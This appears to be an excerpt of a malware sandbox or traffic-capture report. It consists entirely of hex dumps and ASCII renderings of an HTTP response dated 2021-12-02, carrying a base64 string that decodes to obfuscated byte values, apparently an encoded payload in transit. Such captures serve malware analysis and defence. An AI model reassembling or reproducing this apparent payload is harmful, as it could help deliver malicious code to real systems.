                                      Data Ascii: MzLGA3RixgRkMsYDRGLGAwRSxgNzAsYEZFLGAxMyxgODgsYEIzLGA3RSxgOTcsYERGLGBEQSxgRjEsYEM2LGA5RixgNDAsYDM4LGBGRixgREEsYEJGLGA0MSxgRjgsYEZBLGBCRixgODQsYDc4LGBGNSxgMzcsYDU5LGA3RixgRjQsYDdGLGBBNixgQkYsYEVCLGA3RixgRkMsYEIxLGBCRixgMDQsYEYxLGA3RixgRkQsYDI2LGBCRixgMUYsY
                                      2021-12-02 17:36:08 UTC34INData Raw: 67 4f 54 63 73 59 44 56 46 4c 47 42 47 52 69 78 67 4f 55 49 73 59 44 4e 43 4c 47 42 42 52 69 78 67 52 6b 59 73 59 44 5a 46 4c 47 41 33 4f 43 78 67 52 6b 51 73 59 45 4a 47 4c 47 42 47 51 53 78 67 51 55 51 73 59 44 64 47 4c 47 42 42 4e 79 78 67 52 6b 59 73 59 44 4a 42 4c 47 41 33 52 43 78 67 4d 7a 63 73 59 45 5a 47 4c 47 41 34 52 43 78 67 52 6b 4d 73 59 44 41 30 4c 47 42 46 52 69 78 67 52 6b 59 73 59 45 59 31 4c 47 41 35 51 69 78 67 52 6b 4d 73 59 45 45 78 4c 47 41 79 4d 43 78 67 4f 54 6b 73 59 45 51 33 4c 47 42 47 51 69 78 67 4d 55 59 73 59 44 52 42 4c 47 42 42 52 69 78 67 52 6b 59 73 59 45 51 7a 4c 47 41 35 52 43 78 67 52 44 63 73 59 45 5a 47 4c 47 41 33 4d 79 78 67 51 7a 51 73 59 44 6c 43 4c 47 42 47 52 69 78 67 52 6b 45 73 59 44 46 47 4c 47 42 47 4d 43
                                      Data Ascii: gOTcsYDVFLGBGRixgOUIsYDNCLGBBRixgRkYsYDZFLGA3OCxgRkQsYEJGLGBGQSxgQUQsYDdGLGBBNyxgRkYsYDJBLGA3RCxgMzcsYEZGLGA4RCxgRkMsYDA0LGBFRixgRkYsYEY1LGA5QixgRkMsYEExLGAyMCxgOTksYEQ3LGBGQixgMUYsYDRBLGBBRixgRkYsYEQzLGA5RCxgRDcsYEZGLGA3MyxgQzQsYDlCLGBGRixgRkEsYDFGLGBGMC
                                      2021-12-02 17:36:08 UTC36INData Raw: 4c 47 42 46 4f 53 78 67 4e 55 59 73 59 45 5a 47 4c 47 41 7a 4e 79 78 67 52 6b 51 73 59 44 49 78 4c 47 41 33 52 69 78 67 4f 45 4d 73 59 45 5a 47 4c 47 42 46 51 53 78 67 4d 44 55 73 59 45 4a 45 4c 47 42 47 51 53 78 67 4f 44 6b 73 59 44 55 78 4c 47 42 47 4f 43 78 67 51 6b 59 73 59 45 59 35 4c 47 41 77 4e 53 78 67 4d 6b 51 73 59 45 56 43 4c 47 41 33 4e 53 78 67 4e 55 55 73 59 44 64 45 4c 47 41 34 51 79 78 67 4e 54 63 73 59 44 64 47 4c 47 42 42 52 43 78 67 52 54 59 73 59 45 4e 47 4c 47 42 47 4f 53 78 67 4f 55 59 73 59 45 51 7a 4c 47 42 46 52 69 78 67 52 6b 51 73 59 45 51 32 4c 47 42 47 52 69 78 67 52 45 45 73 59 45 59 33 4c 47 42 47 51 79 78 67 4e 54 63 73 59 44 52 47 4c 47 42 46 4f 53 78 67 52 44 55 73 59 44 46 47 4c 47 42 42 51 69 78 67 52 6b 59 73 59 44 55
                                      Data Ascii: LGBFOSxgNUYsYEZGLGAzNyxgRkQsYDIxLGA3RixgOEMsYEZGLGBFQSxgMDUsYEJELGBGQSxgODksYDUxLGBGOCxgQkYsYEY5LGAwNSxgMkQsYEVCLGA3NSxgNUUsYDdELGA4QyxgNTcsYDdGLGBBRCxgRTYsYENGLGBGOSxgOUYsYEQzLGBFRixgRkQsYEQ2LGBGRixgREEsYEY3LGBGQyxgNTcsYDRGLGBFOSxgRDUsYDFGLGBBQixgRkYsYDU
                                      2021-12-02 17:36:08 UTC37INData Raw: 55 59 73 59 44 51 32 4c 47 41 32 52 69 78 67 52 6b 59 73 59 45 46 46 4c 47 41 35 52 43 78 67 51 6a 63 73 59 45 5a 47 4c 47 41 31 4e 43 78 67 51 6b 4d 73 59 45 5a 45 4c 47 42 47 4e 79 78 67 52 6b 59 73 59 44 64 46 4c 47 41 33 52 69 78 67 52 54 67 73 59 44 6c 47 4c 47 41 35 4f 43 78 67 52 6b 55 73 59 44 42 47 4c 47 42 47 52 69 78 67 51 7a 63 73 59 44 46 47 4c 47 42 47 52 69 78 67 4e 6a 55 73 59 45 59 77 4c 47 42 47 4e 69 78 67 4d 30 59 73 59 44 41 78 4c 47 42 43 51 69 78 67 52 6b 4d 73 59 45 4a 43 4c 47 42 45 4e 53 78 67 4d 45 59 73 59 45 4e 45 4c 47 42 46 51 69 78 67 52 6b 59 73 59 44 41 30 4c 47 42 43 52 43 78 67 52 6b 55 73 59 44 55 35 4c 47 42 46 4e 79 78 67 52 6a 55 73 59 44 4d 33 4c 47 41 33 4f 43 78 67 4d 30 51 73 59 45 52 43 4c 47 42 47 52 43 78 67
                                      Data Ascii: UYsYDQ2LGA2RixgRkYsYEFFLGA5RCxgQjcsYEZGLGA1NCxgQkMsYEZELGBGNyxgRkYsYDdFLGA3RixgRTgsYDlGLGA5OCxgRkUsYDBGLGBGRixgQzcsYDFGLGBGRixgNjUsYEYwLGBGNixgM0YsYDAxLGBCQixgRkMsYEJCLGBENSxgMEYsYENELGBFQixgRkYsYDA0LGBCRCxgRkUsYDU5LGBFNyxgRjUsYDM3LGA3OCxgM0QsYERCLGBGRCxg
                                      2021-12-02 17:36:08 UTC38INData Raw: 42 47 4d 79 78 67 4e 55 59 73 59 44 49 77 4c 47 41 77 4d 53 78 67 4e 7a 6b 73 59 44 59 34 4c 47 41 7a 4d 43 78 67 52 6b 59 73 59 45 4e 45 4c 47 42 47 52 69 78 67 4d 44 55 73 59 45 4e 42 4c 47 41 33 4f 53 78 67 4e 7a 63 73 59 44 56 46 4c 47 42 47 52 43 78 67 51 30 49 73 59 45 59 78 4c 47 42 46 51 53 78 67 4f 55 59 73 59 45 5a 43 4c 47 41 77 4e 79 78 67 52 6b 59 73 59 45 51 30 4c 47 41 7a 52 69 78 67 4f 54 59 73 59 45 5a 46 4c 47 42 45 4d 79 78 67 4e 30 59 73 59 45 4e 43 4c 47 41 30 52 69 78 67 52 6b 51 73 59 44 55 31 4c 47 41 30 4d 53 78 67 51 30 59 73 59 45 5a 47 4c 47 41 79 4f 43 78 67 4f 44 59 73 59 45 5a 45 4c 47 42 43 51 69 78 67 4d 55 45 73 59 44 63 31 4c 47 42 47 4d 43 78 67 4e 30 59 73 59 45 5a 45 4c 47 41 30 4e 69 78 67 52 6b 59 73 59 44 49 34 4c
                                      Data Ascii: BGMyxgNUYsYDIwLGAwMSxgNzksYDY4LGAzMCxgRkYsYENELGBGRixgMDUsYENBLGA3OSxgNzcsYDVFLGBGRCxgQ0IsYEYxLGBFQSxgOUYsYEZCLGAwNyxgRkYsYEQ0LGAzRixgOTYsYEZFLGBEMyxgN0YsYENCLGA0RixgRkQsYDU1LGA0MSxgQ0YsYEZGLGAyOCxgODYsYEZELGBCQixgMUEsYDc1LGBGMCxgN0YsYEZELGA0NixgRkYsYDI4L
                                      2021-12-02 17:36:08 UTC40INData Raw: 73 59 45 5a 47 4c 47 42 46 4e 69 78 67 52 44 63 73 59 45 5a 46 4c 47 41 79 51 69 78 67 4e 55 59 73 59 45 45 32 4c 47 41 33 52 69 78 67 52 55 49 73 59 45 55 7a 4c 47 42 45 52 69 78 67 52 6a 41 73 59 45 59 33 4c 47 42 47 4e 79 78 67 4d 30 49 73 59 45 5a 46 4c 47 42 45 4e 79 78 67 4e 6a 6b 73 59 44 6b 32 4c 47 41 33 52 69 78 67 4e 45 59 73 59 45 46 43 4c 47 41 33 51 79 78 67 52 6b 59 73 59 45 59 31 4c 47 41 35 52 69 78 67 51 55 45 73 59 45 5a 47 4c 47 42 45 4e 43 78 67 51 30 55 73 59 45 46 43 4c 47 42 47 52 69 78 67 4d 6a 41 73 59 44 56 46 4c 47 42 47 52 43 78 67 4e 7a 55 73 59 45 5a 47 4c 47 42 45 52 53 78 67 51 6a 4d 73 59 45 52 47 4c 47 41 79 52 43 78 67 52 6b 51 73 59 45 52 45 4c 47 42 47 52 53 78 67 51 54 59 73 59 45 4a 47 4c 47 41 7a 4f 43 78 67 4f 45
                                      Data Ascii: sYEZGLGBFNixgRDcsYEZFLGAyQixgNUYsYEE2LGA3RixgRUIsYEUzLGBERixgRjAsYEY3LGBGNyxgM0IsYEZFLGBENyxgNjksYDk2LGA3RixgNEYsYEFCLGA3QyxgRkYsYEY1LGA5RixgQUEsYEZGLGBENCxgQ0UsYEFCLGBGRixgMjAsYDVFLGBGRCxgNzUsYEZGLGBERSxgQjMsYERGLGAyRCxgRkQsYERELGBGRSxgQTYsYEJGLGAzOCxgOE
                                      2021-12-02 17:36:08 UTC41INData Raw: 4e 43 78 67 51 7a 45 73 59 44 4d 7a 4c 47 41 32 4f 43 78 67 51 30 59 73 59 45 4e 46 4c 47 42 46 51 69 78 67 51 6b 59 73 59 44 42 45 4c 47 41 31 52 53 78 67 4f 55 59 73 59 45 5a 47 4c 47 41 30 52 43 78 67 4f 45 59 73 59 44 64 46 4c 47 41 79 51 79 78 67 4e 55 51 73 59 45 5a 44 4c 47 42 45 4e 79 78 67 51 6b 59 73 59 45 4d 30 4c 47 41 31 51 69 78 67 52 6b 59 73 59 45 59 34 4c 47 42 43 52 43 78 67 4e 30 59 73 59 45 4e 43 4c 47 41 7a 52 69 78 67 4f 54 49 73 59 44 51 34 4c 47 42 47 52 43 78 67 4e 30 49 73 59 44 45 35 4c 47 41 78 4e 53 78 67 52 6a 59 73 59 44 6c 43 4c 47 42 47 52 69 78 67 4f 54 45 73 59 44 4e 47 4c 47 41 31 4e 53 78 67 52 6b 59 73 59 44 51 30 4c 47 42 46 4e 79 78 67 52 44 55 73 59 44 64 47 4c 47 42 47 4e 79 78 67 51 6b 59 73 59 45 45 79 4c 47 41
                                      Data Ascii: NCxgQzEsYDMzLGA2OCxgQ0YsYENFLGBFQixgQkYsYDBELGA1RSxgOUYsYEZGLGA0RCxgOEYsYDdFLGAyQyxgNUQsYEZDLGBENyxgQkYsYEM0LGA1QixgRkYsYEY4LGBCRCxgN0YsYENCLGAzRixgOTIsYDQ4LGBGRCxgN0IsYDE5LGAxNSxgRjYsYDlCLGBGRixgOTEsYDNGLGA1NSxgRkYsYDQ0LGBFNyxgRDUsYDdGLGBGNyxgQkYsYEEyLGA
                                      2021-12-02 17:36:08 UTC42INData Raw: 45 56 47 4c 47 41 33 51 53 78 67 52 55 49 73 59 45 45 34 4c 47 42 43 52 69 78 67 52 6a 63 73 59 44 5a 47 4c 47 42 47 4f 53 78 67 52 6a 51 73 59 44 4d 33 4c 47 42 47 52 69 78 67 4f 45 51 73 59 44 6c 45 4c 47 41 34 4e 53 78 67 4e 30 49 73 59 44 52 42 4c 47 41 34 51 69 78 67 4d 6a 4d 73 59 44 6c 45 4c 47 41 7a 4e 79 78 67 4d 45 59 73 59 45 59 77 4c 47 42 46 4e 69 78 67 4d 30 59 73 59 45 5a 42 4c 47 42 45 4e 79 78 67 52 6b 59 73 59 44 52 46 4c 47 42 45 52 69 78 67 4e 45 49 73 59 44 56 47 4c 47 42 43 51 79 78 67 52 6b 55 73 59 45 55 31 4c 47 42 43 52 69 78 67 4f 44 63 73 59 45 5a 47 4c 47 42 46 4e 69 78 67 51 55 59 73 59 44 49 32 4c 47 42 45 4e 53 78 67 4e 6a 45 73 59 44 67 7a 4c 47 41 35 51 53 78 67 52 45 59 73 59 45 5a 44 4c 47 41 31 4e 79 78 67 4e 54 4d 73
                                      Data Ascii: EVGLGA3QSxgRUIsYEE4LGBCRixgRjcsYDZGLGBGOSxgRjQsYDM3LGBGRixgOEQsYDlELGA4NSxgN0IsYDRBLGA4QixgMjMsYDlELGAzNyxgMEYsYEYwLGBFNixgM0YsYEZBLGBENyxgRkYsYDRFLGBERixgNEIsYDVGLGBCQyxgRkUsYEU1LGBCRixgODcsYEZGLGBFNixgQUYsYDI2LGBENSxgNjEsYDgzLGA5QSxgREYsYEZDLGA1NyxgNTMs
                                      2021-12-02 17:36:08 UTC44INData Raw: 78 67 52 6a 4d 73 59 45 55 32 4c 47 41 35 52 69 78 67 4f 44 59 73 59 44 4d 33 4c 47 42 47 52 69 78 67 51 30 59 73 59 45 4a 47 4c 47 42 46 4f 43 78 67 52 55 59 73 59 45 5a 45 4c 47 42 46 4d 79 78 67 52 44 49 73 59 45 59 79 4c 47 41 79 52 69 78 67 52 6b 59 73 59 45 56 43 4c 47 41 30 4e 69 78 67 4e 44 45 73 59 45 4d 33 4c 47 42 43 52 69 78 67 4d 7a 4d 73 59 44 4e 42 4c 47 41 33 52 53 78 67 52 54 41 73 59 44 41 30 4c 47 42 47 4f 43 78 67 4e 7a 63 73 59 44 67 32 4c 47 42 42 52 53 78 67 52 55 4d 73 59 45 4a 44 4c 47 42 47 52 53 78 67 4d 54 55 73 59 44 56 46 4c 47 42 47 52 69 78 67 4e 30 51 73 59 45 5a 46 4c 47 42 46 4f 43 78 67 4e 55 59 73 59 45 59 79 4c 47 42 45 52 69 78 67 51 54 51 73 59 45 5a 47 4c 47 41 30 4e 43 78 67 52 6a 4d 73 59 44 52 47 4c 47 42 47 4f
                                      Data Ascii: xgRjMsYEU2LGA5RixgODYsYDM3LGBGRixgQ0YsYEJGLGBFOCxgRUYsYEZELGBFMyxgRDIsYEYyLGAyRixgRkYsYEVCLGA0NixgNDEsYEM3LGBCRixgMzMsYDNBLGA3RSxgRTAsYDA0LGBGOCxgNzcsYDg2LGBBRSxgRUMsYEJDLGBGRSxgMTUsYDVFLGBGRixgN0QsYEZFLGBFOCxgNUYsYEYyLGBERixgQTQsYEZGLGA0NCxgRjMsYDRGLGBGO
                                      2021-12-02 17:36:08 UTC45INData Raw: 43 4c 47 42 46 4f 53 78 67 4e 6b 59 73 59 45 59 31 4c 47 41 34 51 69 78 67 4e 30 59 73 59 45 4a 47 4c 47 41 79 4d 43 78 67 4d 6a 51 73 59 44 63 34 4c 47 41 30 52 53 78 67 4f 55 51 73 59 45 5a 46 4c 47 41 32 4e 69 78 67 4e 7a 59 73 59 44 67 79 4c 47 41 35 52 69 78 67 4e 54 4d 73 59 44 6b 77 4c 47 42 45 52 43 78 67 4e 7a 6b 73 59 45 59 31 4c 47 41 32 52 69 78 67 51 7a 55 73 59 45 46 43 4c 47 41 78 52 69 78 67 52 6b 51 73 59 44 52 45 4c 47 41 32 52 69 78 67 52 6b 59 73 59 45 5a 45 4c 47 42 47 4e 43 78 67 52 45 55 73 59 45 4a 45 4c 47 41 33 52 69 78 67 4d 30 59 73 59 45 59 30 4c 47 41 78 51 79 78 67 4d 6b 55 73 59 44 59 78 4c 47 41 78 51 53 78 67 4e 30 55 73 59 45 45 78 4c 47 42 44 51 69 78 67 4f 44 63 73 59 44 56 44 4c 47 41 78 4d 69 78 67 51 54 55 73 59 45
                                      Data Ascii: CLGBFOSxgNkYsYEY1LGA4QixgN0YsYEJGLGAyMCxgMjQsYDc4LGA0RSxgOUQsYEZFLGA2NixgNzYsYDgyLGA5RixgNTMsYDkwLGBERCxgNzksYEY1LGA2RixgQzUsYEFCLGAxRixgRkQsYDRELGA2RixgRkYsYEZELGBGNCxgREUsYEJELGA3RixgM0YsYEY0LGAxQyxgMkUsYDYxLGAxQSxgN0UsYEExLGBDQixgODcsYDVDLGAxMixgQTUsYE
                                      2021-12-02 17:36:08 UTC46INData Raw: 52 6a 59 73 59 45 5a 47 4c 47 42 45 4f 43 78 67 4e 7a 6b 73 59 45 5a 43 4c 47 42 45 4e 79 78 67 51 7a 41 73 59 45 52 43 4c 47 42 44 52 69 78 67 52 6b 55 73 59 44 67 77 4c 47 41 7a 52 69 78 67 52 54 6b 73 59 45 59 33 4c 47 41 30 51 79 78 67 4e 30 59 73 59 45 46 43 4c 47 41 35 52 69 78 67 52 6b 45 73 59 44 49 7a 4c 47 41 78 52 53 78 67 4d 44 59 73 59 44 5a 47 4c 47 42 47 52 69 78 67 4f 44 6b 73 59 45 55 34 4c 47 42 47 51 79 78 67 51 6a 63 73 59 44 63 78 4c 47 41 31 4d 69 78 67 52 6a 55 73 59 44 49 33 4c 47 41 79 4d 69 78 67 4d 55 55 73 59 45 5a 42 4c 47 41 30 52 43 78 67 51 7a 4d 73 59 45 51 33 4c 47 42 47 52 69 78 67 52 54 45 73 59 45 5a 47 4c 47 41 78 4f 43 78 67 4d 45 45 73 59 45 59 77 4c 47 42 45 4e 79 78 67 52 6a 67 73 59 44 64 45 4c 47 42 47 52 53 78
                                      Data Ascii: RjYsYEZGLGBEOCxgNzksYEZCLGBENyxgQzAsYERCLGBDRixgRkUsYDgwLGAzRixgRTksYEY3LGA0QyxgN0YsYEFCLGA5RixgRkEsYDIzLGAxRSxgMDYsYDZGLGBGRixgODksYEU4LGBGQyxgQjcsYDcxLGA1MixgRjUsYDI3LGAyMixgMUUsYEZBLGA0RCxgQzMsYEQ3LGBGRixgRTEsYEZGLGAxOCxgMEEsYEYwLGBENyxgRjgsYDdELGBGRSx
                                      2021-12-02 17:36:08 UTC48INData Raw: 47 42 47 4e 43 78 67 52 6b 4d 73 59 44 4d 33 4c 47 42 42 4d 53 78 67 52 54 63 73 59 45 52 47 4c 47 42 44 4e 43 78 67 51 6b 4d 73 59 45 5a 44 4c 47 41 33 52 69 78 67 52 6b 51 73 59 44 51 32 4c 47 41 33 52 69 78 67 4d 54 4d 73 59 45 59 31 4c 47 42 47 51 79 78 67 4f 54 63 73 59 44 63 32 4c 47 41 31 52 53 78 67 52 6b 59 73 59 45 56 45 4c 47 42 47 4d 53 78 67 52 6b 45 73 59 44 68 47 4c 47 42 43 52 43 78 67 52 6b 49 73 59 44 4e 43 4c 47 42 47 52 53 78 67 52 44 63 73 59 45 59 30 4c 47 41 30 52 69 78 67 52 6b 59 73 59 45 5a 45 4c 47 42 44 51 69 78 67 4d 6a 41 73 59 44 4d 78 4c 47 42 47 4d 53 78 67 4d 44 63 73 59 44 55 77 4c 47 42 44 52 69 78 67 51 6b 59 73 59 44 56 43 4c 47 42 47 52 43 78 67 4e 7a 63 73 59 44 5a 43 4c 47 42 44 52 69 78 67 4e 30 59 73 59 44 41 77
                                      Data Ascii: GBGNCxgRkMsYDM3LGBBMSxgRTcsYERGLGBDNCxgQkMsYEZDLGA3RixgRkQsYDQ2LGA3RixgMTMsYEY1LGBGQyxgOTcsYDc2LGA1RSxgRkYsYEVELGBGMSxgRkEsYDhGLGBCRCxgRkIsYDNCLGBGRSxgRDcsYEY0LGA0RixgRkYsYEZELGBDQixgMjAsYDMxLGBGMSxgMDcsYDUwLGBDRixgQkYsYDVCLGBGRCxgNzcsYDZCLGBDRixgN0YsYDAw
                                      2021-12-02 17:36:08 UTC49INData Raw: 63 73 59 45 5a 47 4c 47 41 31 4d 79 78 67 52 6b 45 73 59 45 52 43 4c 47 42 47 52 53 78 67 4f 54 59 73 59 45 5a 47 4c 47 42 42 4e 69 78 67 4e 6b 59 73 59 44 6b 30 4c 47 41 33 52 69 78 67 51 30 49 73 59 45 4a 47 4c 47 41 34 51 79 78 67 4e 30 45 73 59 45 49 31 4c 47 42 43 4d 69 78 67 52 6a 41 73 59 44 6c 43 4c 47 42 47 52 69 78 67 4e 6a 55 73 59 44 4e 47 4c 47 41 31 4e 53 78 67 52 6b 59 73 59 44 4e 46 4c 47 41 35 52 43 78 67 4e 54 63 73 59 44 4e 47 4c 47 42 44 4d 79 78 67 51 55 49 73 59 45 4a 47 4c 47 42 47 4e 43 78 67 4d 30 59 73 59 45 5a 47 4c 47 41 79 52 69 78 67 4e 30 55 73 59 45 5a 47 4c 47 42 47 4e 43 78 67 4e 45 59 73 59 45 5a 42 4c 47 42 46 4d 69 78 67 4d 7a 63 73 59 45 5a 46 4c 47 41 35 52 43 78 67 4f 44 4d 73 59 45 59 78 4c 47 42 47 52 53 78 67 4f
                                      Data Ascii: csYEZGLGA1MyxgRkEsYERCLGBGRSxgOTYsYEZGLGBBNixgNkYsYDk0LGA3RixgQ0IsYEJGLGA4QyxgN0EsYEI1LGBCMixgRjAsYDlCLGBGRixgNjUsYDNGLGA1NSxgRkYsYDNFLGA5RCxgNTcsYDNGLGBDMyxgQUIsYEJGLGBGNCxgM0YsYEZGLGAyRixgN0UsYEZGLGBGNCxgNEYsYEZBLGBFMixgMzcsYEZFLGA5RCxgODMsYEYxLGBGRSxgO
                                      2021-12-02 17:36:08 UTC50INData Raw: 45 4e 53 78 67 51 6b 59 73 59 45 46 42 4c 47 42 47 4d 79 78 67 52 55 45 73 59 44 6c 47 4c 47 41 34 4e 69 78 67 4e 54 63 73 59 45 49 7a 4c 47 41 33 52 69 78 67 52 55 59 73 59 45 52 47 4c 47 42 47 52 53 78 67 4d 7a 51 73 59 45 5a 45 4c 47 42 45 52 69 78 67 51 6b 59 73 59 45 59 34 4c 47 41 34 52 43 78 67 52 6b 55 73 59 44 67 7a 4c 47 41 34 4d 43 78 67 4e 54 51 73 59 45 4a 47 4c 47 41 79 4e 53 78 67 4e 44 67 73 59 45 49 31 4c 47 42 46 52 43 78 67 4f 54 59 73 59 45 51 78 4c 47 41 33 52 53 78 67 4e 45 49 73 59 44 49 79 4c 47 42 45 4e 53 78 67 4e 6b 59 73 59 45 5a 44 4c 47 41 35 51 69 78 67 4f 44 63 73 59 45 46 47 4c 47 41 33 52 69 78 67 4f 44 55 73 59 45 51 33 4c 47 41 30 4e 79 78 67 4e 30 59 73 59 45 56 42 4c 47 41 7a 52 69 78 67 52 6a 59 73 59 45 4e 43 4c 47
                                      Data Ascii: ENSxgQkYsYEFBLGBGMyxgRUEsYDlGLGA4NixgNTcsYEIzLGA3RixgRUYsYERGLGBGRSxgMzQsYEZELGBERixgQkYsYEY4LGA4RCxgRkUsYDgzLGA4MCxgNTQsYEJGLGAyNSxgNDgsYEI1LGBFRCxgOTYsYEQxLGA3RSxgNEIsYDIyLGBENSxgNkYsYEZDLGA5QixgODcsYEFGLGA3RixgODUsYEQ3LGA0NyxgN0YsYEVBLGAzRixgRjYsYENCLG
                                      2021-12-02 17:36:08 UTC52INData Raw: 59 44 49 79 4c 47 41 79 4e 53 78 67 52 54 51 73 59 44 6b 32 4c 47 41 30 51 79 78 67 4e 44 63 73 59 44 6b 30 4c 47 41 33 4e 69 78 67 52 55 45 73 59 45 4a 44 4c 47 42 47 51 53 78 67 4e 54 63 73 59 45 55 78 4c 47 42 45 4e 53 78 67 4e 30 59 73 59 45 55 79 4c 47 42 43 4e 79 78 67 4f 54 6b 73 59 45 5a 44 4c 47 42 43 51 53 78 67 52 54 6b 73 59 44 6b 7a 4c 47 42 45 52 69 78 67 52 6b 49 73 59 45 46 47 4c 47 42 47 4f 53 78 67 4d 45 59 73 59 45 5a 45 4c 47 41 31 4e 79 78 67 52 54 63 73 59 44 4d 30 4c 47 41 31 4f 53 78 67 4d 6a 4d 73 59 44 46 43 4c 47 41 78 4f 53 78 67 51 30 4d 73 59 44 49 35 4c 47 41 33 52 53 78 67 52 55 45 73 59 45 4a 44 4c 47 42 43 51 53 78 67 51 7a 41 73 59 45 46 43 4c 47 42 47 52 69 78 67 52 6a 67 73 59 44 49 33 4c 47 42 43 52 69 78 67 52 6b 59
                                      Data Ascii: YDIyLGAyNSxgRTQsYDk2LGA0QyxgNDcsYDk0LGA3NixgRUEsYEJDLGBGQSxgNTcsYEUxLGBENSxgN0YsYEUyLGBCNyxgOTksYEZDLGBCQSxgRTksYDkzLGBERixgRkIsYEFGLGBGOSxgMEYsYEZELGA1NyxgRTcsYDM0LGA1OSxgMjMsYDFCLGAxOSxgQ0MsYDI5LGA3RSxgRUEsYEJDLGBCQSxgQzAsYEFCLGBGRixgRjgsYDI3LGBCRixgRkY
                                      2021-12-02 17:36:08 UTC53INData Raw: 53 78 67 52 55 59 73 59 44 56 44 4c 47 42 47 51 79 78 67 4e 7a 6b 73 59 44 6b 31 4c 47 42 47 52 69 78 67 52 54 59 73 59 44 4e 47 4c 47 41 30 51 79 78 67 4f 44 51 73 59 45 49 32 4c 47 42 45 52 43 78 67 52 6b 55 73 59 45 55 32 4c 47 42 47 52 69 78 67 4d 7a 41 73 59 44 4d 35 4c 47 41 77 4d 69 78 67 4f 55 51 73 59 44 55 33 4c 47 42 47 52 69 78 67 52 54 6b 73 59 44 64 47 4c 47 41 34 51 69 78 67 4e 55 55 73 59 45 5a 45 4c 47 42 44 52 53 78 67 52 45 59 73 59 45 5a 43 4c 47 41 34 4e 79 78 67 4e 30 59 73 59 44 4e 43 4c 47 42 47 52 43 78 67 4e 6b 59 73 59 44 51 32 4c 47 42 47 52 69 78 67 4e 45 45 73 59 45 55 34 4c 47 41 32 51 69 78 67 4d 30 55 73 59 44 49 32 4c 47 41 35 52 53 78 67 52 6b 4d 73 59 44 46 45 4c 47 41 31 52 43 78 67 4d 44 67 73 59 45 59 31 4c 47 41 35
                                      Data Ascii: SxgRUYsYDVDLGBGQyxgNzksYDk1LGBGRixgRTYsYDNGLGA0QyxgODQsYEI2LGBERCxgRkUsYEU2LGBGRixgMzAsYDM5LGAwMixgOUQsYDU3LGBGRixgRTksYDdGLGA4QixgNUUsYEZELGBDRSxgREYsYEZCLGA4NyxgN0YsYDNCLGBGRCxgNkYsYDQ2LGBGRixgNEEsYEU4LGA2QixgM0UsYDI2LGA5RSxgRkMsYDFELGA1RCxgMDgsYEY1LGA5
                                      2021-12-02 17:36:08 UTC54INData Raw: 4d 33 4c 47 42 47 52 53 78 67 52 6a 55 73 59 44 4e 47 4c 47 42 46 52 69 78 67 51 6a 63 73 59 44 52 45 4c 47 41 35 4d 79 78 67 52 45 59 73 59 45 59 79 4c 47 41 7a 4e 79 78 67 4d 44 6b 73 59 44 49 7a 4c 47 41 35 4d 69 78 67 52 45 59 73 59 44 45 31 4c 47 41 35 4e 43 78 67 51 6a 59 73 59 44 45 35 4c 47 42 43 4e 69 78 67 52 6b 59 73 59 45 56 43 4c 47 41 7a 4e 79 78 67 52 6b 45 73 59 44 56 45 4c 47 41 77 4f 53 78 67 52 54 6b 73 59 45 52 47 4c 47 42 47 51 79 78 67 51 6a 63 73 59 44 42 44 4c 47 41 31 52 69 78 67 52 6b 59 73 59 44 52 47 4c 47 42 47 52 53 78 67 4d 45 51 73 59 44 64 42 4c 47 42 47 52 43 78 67 52 6b 59 73 59 45 5a 42 4c 47 42 44 52 43 78 67 52 6b 55 73 59 45 4e 46 4c 47 41 7a 52 69 78 67 4d 7a 51 73 59 44 46 45 4c 47 42 47 52 43 78 67 52 54 41 73 59
                                      Data Ascii: M3LGBGRSxgRjUsYDNGLGBFRixgQjcsYDRELGA5MyxgREYsYEYyLGAzNyxgMDksYDIzLGA5MixgREYsYDE1LGA5NCxgQjYsYDE5LGBCNixgRkYsYEVCLGAzNyxgRkEsYDVELGAwOSxgRTksYERGLGBGQyxgQjcsYDBDLGA1RixgRkYsYDRGLGBGRSxgMEQsYDdBLGBGRCxgRkYsYEZBLGBDRCxgRkUsYENFLGAzRixgMzQsYDFELGBGRCxgRTAsY
                                      2021-12-02 17:36:08 UTC59INData Raw: 79 51 69 78 67 4d 6b 51 73 59 44 49 79 4c 47 41 7a 4f 53 78 67 4e 44 63 73 59 45 55 32 4c 47 41 33 4e 79 78 67 51 54 55 73 59 45 55 31 4c 47 42 47 51 69 78 67 51 30 55 73 59 45 46 43 4c 47 41 32 4d 79 78 67 51 6b 4d 73 59 45 5a 42 4c 47 41 34 4d 79 78 67 52 54 6b 73 59 45 46 47 4c 47 42 47 4e 53 78 67 4d 6a 63 73 59 45 45 30 4c 47 41 35 4e 79 78 67 4e 30 59 73 59 45 59 7a 4c 47 42 42 51 69 78 67 51 6b 59 73 59 45 4d 34 4c 47 41 33 52 69 78 67 52 6a 55 73 59 44 45 78 4c 47 41 31 4f 53 78 67 51 7a 63 73 59 45 52 47 4c 47 42 45 4e 69 78 67 52 6b 45 73 59 45 59 32 4c 47 41 34 52 69 78 67 4e 44 67 73 59 45 55 35 4c 47 41 33 4e 69 78 67 4e 55 55 73 59 45 5a 45 4c 47 41 32 4e 53 78 67 52 6b 59 73 59 44 45 79 4c 47 42 43 52 43 78 67 52 6b 45 73 59 44 42 47 4c 47
                                      Data Ascii: yQixgMkQsYDIyLGAzOSxgNDcsYEU2LGA3NyxgQTUsYEU1LGBGQixgQ0UsYEFCLGA2MyxgQkMsYEZBLGA4MyxgRTksYEFGLGBGNSxgMjcsYEE0LGA5NyxgN0YsYEYzLGBBQixgQkYsYEM4LGA3RixgRjUsYDExLGA1OSxgQzcsYERGLGBENixgRkEsYEY2LGA4RixgNDgsYEU5LGA3NixgNUUsYEZELGA2NSxgRkYsYDEyLGBCRCxgRkEsYDBGLG
                                      2021-12-02 17:36:08 UTC63INData Raw: 51 30 55 73 59 45 4a 47 4c 47 41 33 51 69 78 67 52 54 63 73 59 45 56 45 4c 47 42 43 52 69 78 67 4d 44 4d 73 59 44 5a 47 4c 47 42 47 52 69 78 67 4f 45 59 73 59 44 6b 7a 4c 47 42 47 52 69 78 67 52 6a 67 73 59 44 52 47 4c 47 41 30 52 53 78 67 4e 30 59 73 59 45 45 33 4c 47 42 46 52 69 78 67 4d 54 55 73 59 45 5a 47 4c 47 41 32 51 53 78 67 52 6a 41 73 59 45 59 32 4c 47 42 42 52 69 78 67 4f 44 45 73 59 44 49 78 4c 47 42 47 52 69 78 67 4d 45 55 73 59 44 59 32 4c 47 41 34 4e 53 78 67 52 6a 55 73 59 45 5a 47 4c 47 42 47 51 53 78 67 4f 45 51 73 59 44 64 46 4c 47 41 77 52 43 78 67 4e 30 45 73 59 45 5a 45 4c 47 41 32 4d 53 78 